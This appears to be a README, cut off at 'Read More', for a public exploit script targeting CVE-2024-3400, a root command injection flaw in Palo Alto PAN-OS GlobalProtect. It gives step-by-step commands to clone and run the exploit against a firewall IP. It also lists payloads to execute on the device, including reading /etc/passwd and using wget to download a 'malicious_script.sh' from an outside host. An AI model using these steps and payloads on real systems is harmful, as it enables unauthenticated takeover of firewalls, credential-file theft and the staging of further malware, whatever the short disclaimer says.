PAN-OS Firewall Exploit Script This script is designed to demonstrate the exploitation of vulnerabilities in PAN-OS firewalls. It sends a specially crafted payload to the firewall's API endpoint to execute arbitrary commands. This exploit specifically targets CVE-2024-3400, a command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions. Distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Note: Please ensure that you only use this script for legal and ethical purposes, and only on machines that you have permission to test on. Usage To use this project, follow these steps: Clone this repo: “`bash git clone https://github.com/DrewskyDev/CVE-2024-3400 Change directory to the repo: “`bash cd CVE-2024-3400 Install the required modules: “`bash pip install -r requirements.txt Run the python script. “`bash python3 exploit.py Follow the prompts to enter the IP address of the vulnerable PAN-OS firewall and the payload to execute. Example Payloads List Directory Contents: “`bash ls -la Print the contents of a specific file: “`bash cat /etc/passwd Print the username of the current user who is logged in to the system: “`bash whoami Download a file from the internet (requires wget or curl installed): “`bash wget https://example.com/malicious_script.sh -O…Read More